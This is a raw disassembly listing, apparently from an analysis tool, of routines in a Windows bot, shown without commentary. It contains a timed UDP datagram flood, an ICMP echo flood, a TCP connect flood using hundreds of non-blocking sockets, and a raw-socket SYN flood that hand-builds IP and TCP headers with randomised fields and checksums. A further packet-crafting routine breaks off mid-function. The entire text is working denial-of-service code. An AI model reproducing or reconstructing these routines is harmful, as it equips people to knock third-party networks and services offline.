inc edx
mov word_4D5290, dx
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_4D5294 ; Dst
call _memset
add esp, 0Ch
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
push 41Ch
push offset byte_4D5278
push [ebp+74h+var_4]
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_415F4A
inc [ebp+74h+arg_0]
loc_415EB1: ; CODE XREF: sub_415C89+105�j
call esi ; GetTickCount
sub eax, [ebp+74h+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_30]
jbe loc_415D93
push [ebp+74h+var_4]
call dword_444218 ; closesocket
mov eax, [ebp+74h+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+74h+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_1B8]
push eax
lea eax, [ebp+74h+var_138]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435738 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+74h+var_24], edi
jnz short loc_415F2D
loc_415F10: ; CODE XREF: sub_415C89+64�j
push edi ; int
push [ebp+74h+var_28] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_1BC] ; int
call sub_40123B
add esp, 14h
loc_415F2D: ; CODE XREF: sub_415C89+5E�j
; sub_415C89+285�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_38]
call sub_40B149
pop ecx
pop ecx
push edi
call ds:dword_42B068 ; ExitThread
loc_415F4A: ; CODE XREF: sub_415C89+21F�j
push [ebp+74h+var_4]
call dword_444218 ; closesocket
call dword_4441C4 ; WSAGetLastError
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_1B8]
push eax
push offset asc_4356F0 ; "-"
lea eax, [ebp+74h+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp loc_415CE4
sub_415C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_415F82 proc near ; DATA XREF: sub_40274D+524E�o
var_10320 = byte ptr -10320h
Dest = byte ptr -344h
var_144 = dword ptr -144h
Str = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 10320h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_144]
rep movsd
xor edi, edi
inc edi
mov [eax+120h], edi
call dword_444158 ; IcmpCreateFile
mov [ebp+74h+arg_0], eax
lea eax, [ebp+74h+var_C0]
push eax
call dword_44417C ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_415FD9
lea eax, [ebp+74h+var_C0]
push eax
call dword_444168 ; gethostbyname
cmp eax, ebx
jz short loc_415FDF
loc_415FD9: ; CODE XREF: sub_415F82+47�j
cmp [ebp+74h+arg_0], 0FFFFFFFFh
jnz short loc_416038
loc_415FDF: ; CODE XREF: sub_415F82+55�j
lea eax, [ebp+74h+var_C0]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_43582C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_28], ebx
jnz short loc_41601C
push ebx ; int
push [ebp+74h+var_2C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_144] ; int
call sub_40123B
add esp, 14h
loc_41601C: ; CODE XREF: sub_415F82+78�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_30]
call sub_40B149
pop ecx
pop ecx
push edi
jmp loc_4160FD
; ---------------------------------------------------------------------------
loc_416038: ; CODE XREF: sub_415F82+5B�j
cmp eax, ebx
jz short loc_416048
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+74h+var_4], eax
jmp short loc_41604B
; ---------------------------------------------------------------------------
loc_416048: ; CODE XREF: sub_415F82+B8�j
mov [ebp+74h+var_4], esi
loc_41604B: ; CODE XREF: sub_415F82+C4�j
push 1Ch ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
or [ebp+74h+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+74h+var_3C], eax
jle short loc_41606B
mov [ebp+74h+var_3C], eax
loc_41606B: ; CODE XREF: sub_415F82+E4�j
cmp [ebp+74h+var_38], edi
jge short loc_416073
mov [ebp+74h+var_38], edi
loc_416073: ; CODE XREF: sub_415F82+EC�j
xor esi, esi
cmp [ebp+74h+var_40], ebx
jle short loc_4160A0
loc_41607A: ; CODE XREF: sub_415F82+11C�j
push [ebp+74h+var_38]
lea eax, [ebp+74h+Dst]
push 1Ch
push eax
push ebx
push [ebp+74h+var_3C]
lea eax, [ebp+74h+var_10320]
push eax
push [ebp+74h+var_4]
push [ebp+74h+arg_0]
call dword_4441F4 ; IcmpSendEcho
inc esi
cmp esi, [ebp+74h+var_40]
jl short loc_41607A
loc_4160A0: ; CODE XREF: sub_415F82+F6�j
push [ebp+74h+arg_0]
call dword_44418C ; IcmpCloseHandle
lea eax, [ebp+74h+var_C0]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435800 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_28], ebx
jnz short loc_4160E6
push ebx ; int
push [ebp+74h+var_2C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_144] ; int
call sub_40123B
add esp, 14h
loc_4160E6: ; CODE XREF: sub_415F82+142�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_30]
call sub_40B149
pop ecx
pop ecx
push ebx
loc_4160FD: ; CODE XREF: sub_415F82+B1�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_415F82 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_416104 proc near ; DATA XREF: sub_40274D+5498�o
var_10311 = byte ptr -10311h
var_10310 = byte ptr -10310h
Dest = byte ptr -334h
var_134 = dword ptr -134h
Str = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov eax, 10310h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_134]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 11h
push 2
push 2
call dword_444100 ; socket
push 10h ; Size
mov ebx, eax
xor edi, edi
lea eax, [ebp+74h+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+74h+var_B0]
push eax
mov [ebp+74h+Dst], 2
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+74h+arg_0], eax
jnz short loc_4161E1
lea eax, [ebp+74h+var_B0]
push eax
call dword_444168 ; gethostbyname
cmp eax, edi
jnz short loc_4161DA
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435880 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_18], edi
jnz short loc_4161BE
push edi ; int
push [ebp+74h+var_1C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_134] ; int
call sub_40123B
add esp, 14h
loc_4161BE: ; CODE XREF: sub_416104+98�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_20]
call sub_40B149
pop ecx
pop ecx
push esi
jmp loc_41630A
; ---------------------------------------------------------------------------
loc_4161DA: ; CODE XREF: sub_416104+7B�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_4161E4
; ---------------------------------------------------------------------------
loc_4161E1: ; CODE XREF: sub_416104+6D�j
lea eax, [ebp+74h+arg_0]
loc_4161E4: ; CODE XREF: sub_416104+DB�j
cmp [ebp+74h+var_24], edi
mov eax, [eax]
mov [ebp+74h+var_C], eax
jnz short loc_4161FF
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_416202
; ---------------------------------------------------------------------------
loc_4161FF: ; CODE XREF: sub_416104+E8�j
push [ebp+74h+var_24]
loc_416202: ; CODE XREF: sub_416104+F9�j
call dword_444260 ; htons
cmp [ebp+74h+var_24], esi
mov [ebp+74h+var_E], ax
jge short loc_416214
mov [ebp+74h+var_24], esi
loc_416214: ; CODE XREF: sub_416104+10B�j
mov eax, 0FFFFh
cmp [ebp+74h+var_24], eax
jle short loc_416221
mov [ebp+74h+var_24], eax
loc_416221: ; CODE XREF: sub_416104+118�j
mov eax, [ebp+74h+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+74h+var_28], edi
mov [ebp+74h+var_30], eax
jnz short loc_416235
mov [ebp+74h+var_28], esi
loc_416235: ; CODE XREF: sub_416104+12C�j
xor esi, esi
cmp [ebp+74h+var_2C], edi
jle short loc_4162AE
loc_41623C: ; CODE XREF: sub_416104+150�j
call _rand
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+74h+var_2C]
mov [ebp+esi+74h+var_10311], dl
jl short loc_41623C
jmp short loc_4162AE
; ---------------------------------------------------------------------------
loc_416258: ; CODE XREF: sub_416104+1AD�j
dec [ebp+74h+var_30]
push 0Bh
pop esi
loc_41625E: ; CODE XREF: sub_416104+18A�j
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+74h+var_2C]
sub eax, edx
push eax
lea eax, [ebp+74h+var_10310]
push eax
push ebx
call dword_4440CC ; sendto
push [ebp+74h+var_28]
call ds:dword_42B014 ; Sleep
dec esi
jnz short loc_41625E
cmp [ebp+74h+var_24], edi
jnz short loc_4162AE
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_444260 ; htons
mov [ebp+74h+var_E], ax
loc_4162AE: ; CODE XREF: sub_416104+136�j
; sub_416104+152�j ...
cmp [ebp+74h+var_30], edi
jg short loc_416258
dec [ebp+74h+var_30]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435854 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_18], edi
jnz short loc_4162F3
push edi ; int
push [ebp+74h+var_1C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_134] ; int
call sub_40123B
add esp, 14h
loc_4162F3: ; CODE XREF: sub_416104+1CD�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_20]
call sub_40B149
pop ecx
pop ecx
push edi
loc_41630A: ; CODE XREF: sub_416104+D1�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_416104 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416311 proc near ; CODE XREF: sub_4163CB+27�p
var_654 = dword ptr -654h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+Dst], 2
call dword_444260 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_4163C7
push esi
push edi
mov [ebp+arg_0], eax
mov edi, 190h
loc_41635B: ; CODE XREF: sub_416311+B2�j
xor esi, esi
loc_41635D: ; CODE XREF: sub_416311+77�j
push 0
push 1
push 2
call ds:dword_42B20C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+esi*4+var_654], eax
jz short loc_416385
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_42B1E4 ; ioctlsocket
loc_416385: ; CODE XREF: sub_416311+62�j
inc esi
cmp esi, edi
jl short loc_41635D
xor esi, esi
loc_41638C: ; CODE XREF: sub_416311+91�j
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+esi*4+var_654]
call ds:dword_42B1F4 ; connect
inc esi
cmp esi, edi
jl short loc_41638C
push 64h
call ds:dword_42B014 ; Sleep
xor esi, esi
loc_4163AE: ; CODE XREF: sub_416311+AD�j
push [ebp+esi*4+var_654]
call ds:dword_42B1F8 ; closesocket
inc esi
cmp esi, edi
jl short loc_4163AE
dec [ebp+arg_0]
jnz short loc_41635B
pop edi
pop esi
loc_4163C7: ; CODE XREF: sub_416311+3E�j
xor eax, eax
leave
retn
sub_416311 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4163CB(int,char *Str,int)
sub_4163CB proc near ; CODE XREF: sub_41640E+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+Str] ; Str
mov edi, eax
call j__atol
push [esp+14h+arg_8] ; Str
mov ebx, eax
call j__atol
mov esi, eax
push esi
push ebx
push edi
call sub_416311
add esp, 18h
test eax, eax
jnz short loc_4163FF
inc eax
loc_4163FF: ; CODE XREF: sub_4163CB+31�j
cdq
mov ecx, 3E8h
idiv ecx
pop edi
cdq
idiv esi
pop esi
pop ebx
retn
sub_4163CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41640E proc near ; DATA XREF: sub_40274D+4B72�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_4163CB
push eax
lea eax, [ebp+Dest]
push offset asc_4358A8 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_41648B
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_40123B
add esp, 14h
loc_41648B: ; CODE XREF: sub_41640E+5B�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41640E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_4164A9 proc near ; CODE XREF: sub_41677E+3C�p
var_288 = byte ptr -288h
Dest = byte ptr -0F8h
var_B8 = dword ptr -0B8h
var_B0 = byte ptr -0B0h
var_AF = byte ptr -0AFh
var_9C = byte ptr -9Ch
var_90 = byte ptr -90h
var_88 = byte ptr -88h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
Src = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = word ptr -62h
Dst = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+68h+var_B0], bl
lea edi, [ebp+68h+var_AF]
rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call dword_444110 ; WSAStartup
test eax, eax
jz short loc_4164E5
xor eax, eax
jmp loc_416777
; ---------------------------------------------------------------------------
loc_4164E5: ; CODE XREF: sub_4164A9+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_444074 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_41676F
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push ebx
push eax
mov [ebp+68h+var_3C], edi
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_416766
push esi
push 10h ; Size
lea eax, [ebp+68h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+68h+arg_8]
mov [ebp+68h+Dst], 2
call dword_444260 ; htons
mov esi, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_4A], ax
mov [ebp+68h+var_48], esi
mov [ebp+68h+var_1C], 45h
call dword_444260 ; htons
push [ebp+68h+arg_8]
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_18], di
mov [ebp+68h+var_16], bx
mov [ebp+68h+var_14], 80h
mov [ebp+68h+var_13], 6
mov [ebp+68h+var_12], bx
mov [ebp+68h+var_C], esi
call dword_444260 ; htons
push 4000h
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_28], ebx
mov [ebp+68h+var_24], 50h
mov [ebp+68h+var_23], 2
call dword_444260 ; htons
mov [ebp+68h+var_22], ax
lea eax, [ebp+68h+var_74]
push eax
mov [ebp+68h+var_1E], bx
mov [ebp+68h+var_8], ebx
call ds:dword_42B0DC ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
push [ebp+68h+var_70]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_74]
cdq
push edx
push eax
call __allmul
add eax, [ebp+68h+var_38]
mov edi, edx
adc edi, [ebp+68h+var_34]
mov [ebp+68h+var_B8], eax
mov [ebp+68h+var_20], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_444260 ; htons
mov [ebp+68h+var_30], ax
call _rand
call _rand
push eax
call dword_444260 ; htons
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_2C], eax
call dword_444234 ; htonl
push 14h
pop esi
jmp short loc_41667F
; ---------------------------------------------------------------------------
loc_416617: ; CODE XREF: sub_4164A9+28A�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, edi
jg loc_416762
jl short loc_41663D
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_B8]
jnb loc_416762
loc_41663D: ; CODE XREF: sub_4164A9+186�j
mov [ebp+68h+var_20], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_444260 ; htons
mov [ebp+68h+var_30], ax
call _rand
call _rand
push eax
call dword_444260 ; htons
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_2C], eax
call dword_444234 ; htonl
loc_41667F: ; CODE XREF: sub_4164A9+16C�j
inc [ebp+68h+arg_4]
mov [ebp+68h+var_10], eax
mov eax, [ebp+68h+var_C]
push esi
mov [ebp+68h+var_68], eax
mov [ebp+68h+var_64], bl
mov [ebp+68h+var_63], 6
call dword_444260 ; htons
mov [ebp+68h+var_62], ax
mov eax, [ebp+68h+var_10]
mov [ebp+68h+Src], eax
lea eax, [ebp+68h+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+68h+var_B0]
push eax ; Dst
call _memcpy
lea eax, [ebp+68h+var_30]
push esi ; Size
push eax ; Src
lea eax, [ebp+68h+var_90]
push eax ; Dst
call _memcpy
lea eax, [ebp+68h+var_B0]
push 34h
push eax
call sub_402422
mov [ebp+68h+var_20], ax
lea eax, [ebp+68h+var_1C]
push esi ; Size
push eax ; Src
lea eax, [ebp+68h+var_B0]
push eax ; Dst
call _memcpy
lea eax, [ebp+68h+var_30]
push esi ; Size
push eax ; Src
lea eax, [ebp+68h+var_9C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+68h+var_88]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+68h+var_B0]
push 28h
push eax
call sub_402422
mov [ebp+68h+var_12], ax
lea eax, [ebp+68h+var_1C]
push esi ; Size
push eax ; Src
lea eax, [ebp+68h+var_B0]
push eax ; Dst
call _memcpy
add esp, 14h
push 10h
lea eax, [ebp+68h+Dst]
push eax
push ebx
push 28h
lea eax, [ebp+68h+var_B0]
push eax
push [ebp+68h+var_4]
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_416617
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+68h+Dest]
push offset asc_4358D4 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+68h+Dest]
push eax
call sub_417D70
add esp, 10h
jmp short loc_416765
; ---------------------------------------------------------------------------
loc_416762: ; CODE XREF: sub_4164A9+180�j
; sub_4164A9+18E�j
mov ebx, [ebp+68h+var_8]
loc_416765: ; CODE XREF: sub_4164A9+2B7�j
pop esi
loc_416766: ; CODE XREF: sub_4164A9+73�j
push [ebp+68h+var_4]
call dword_444218 ; closesocket
loc_41676F: ; CODE XREF: sub_4164A9+57�j
call dword_444224 ; WSACleanup
mov eax, ebx
loc_416777: ; CODE XREF: sub_4164A9+37�j
pop edi
pop ebx
add ebp, 68h
leave
retn
sub_4164A9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41677E(int,char *Str,int)
sub_41677E proc near ; CODE XREF: sub_4167D6+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+Str] ; Str
mov esi, eax
call j__atol
push [esp+14h+arg_8] ; Str
mov ebx, eax
call j__atol
mov edi, eax
call _rand
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4164A9
add esp, 1Ch
test eax, eax
jnz short loc_4167C7
inc eax
loc_4167C7: ; CODE XREF: sub_41677E+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_41677E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167D6 proc near ; DATA XREF: sub_40274D+6140�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_41677E
push eax
lea eax, [ebp+Dest]
push offset asc_4358F4 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_416853
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_40123B
add esp, 14h
loc_416853: ; CODE XREF: sub_4167D6+5B�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4167D6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_416871 proc near ; CODE XREF: sub_416A7E+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Src = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Dst = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 98h
and [ebp+70h+var_88], 0
and [ebp+70h+var_58], 0
push ebx
push esi
push edi
push 4
pop esi
xor eax, eax
xor ecx, ecx
inc ecx
push 6
pop edx
mov ebx, 0FFh
mov [ebp+70h+var_84], ecx
mov [ebp+70h+var_78], edx
lea edi, [ebp+70h+var_54]
mov [ebp+70h+var_80], 2
mov [ebp+70h+var_7C], esi
mov [ebp+70h+var_74], 8
mov [ebp+70h+var_70], 0Ch
mov [ebp+70h+var_6C], 11h
mov [ebp+70h+var_68], 16h
mov [ebp+70h+var_64], 29h
mov [ebp+70h+var_60], 3Ah
mov [ebp+70h+var_5C], ebx
stosd
mov [ebp+70h+var_50], eax
mov [ebp+70h+var_4C], eax
mov [ebp+70h+var_48], eax
mov [ebp+70h+var_3C], edx
mov [ebp+70h+var_34], ecx
mov [ebp+70h+var_30], eax
lea edi, [ebp+70h+var_2C]
mov [ebp+70h+var_44], 2000h
mov [ebp+70h+var_40], esi
mov [ebp+70h+var_38], 3FFFh
stosd
mov edi, 100h
push edi ; unsigned int
mov [ebp+70h+var_28], ecx
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
push edi
push eax
mov [ebp+70h+var_4], eax
call dword_444220 ; gethostname
push [ebp+70h+var_4]
call dword_444168 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
push ebx
push 3
push 2
mov [ebp+70h+var_C], eax
call dword_444100 ; socket
push esi
lea ecx, [ebp+70h+var_28]
push ecx
push 2
push 0
push eax
mov [ebp+70h+var_4], eax
call dword_444120 ; setsockopt
mov esi, 200h
push esi ; Size
call _malloc
mov edi, ds:dword_42B038
pop ecx
mov [ebp+70h+Dst], eax
call edi ; GetTickCount
mov [ebp+70h+var_10], eax
mov eax, [ebp+70h+arg_0]
push 29Ah
mov [ebp+70h+var_94], eax
mov [ebp+70h+var_98], 2
call dword_444260 ; htons
mov [ebp+70h+var_96], ax
jmp loc_416A4A
; ---------------------------------------------------------------------------
loc_416984: ; CODE XREF: sub_416871+1EA�j
call _rand
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+70h+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+70h+var_C], edx
call _rand
cdq
mov ecx, ebx
idiv ecx
mov [ebp+70h+var_54], edx
call _rand
cdq
mov ecx, 1FA4h
idiv ecx
mov [ebp+70h+Src], 45h
mov [ebp+70h+var_23], 4
mov [ebp+70h+var_2C], edx
call _rand
mov [ebp+70h+var_20], ax
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
xor eax, eax
mov ax, word ptr [ebp+edx*4+70h+var_50]
push eax
call dword_444260 ; htons
push esi
mov [ebp+70h+var_1E], ax
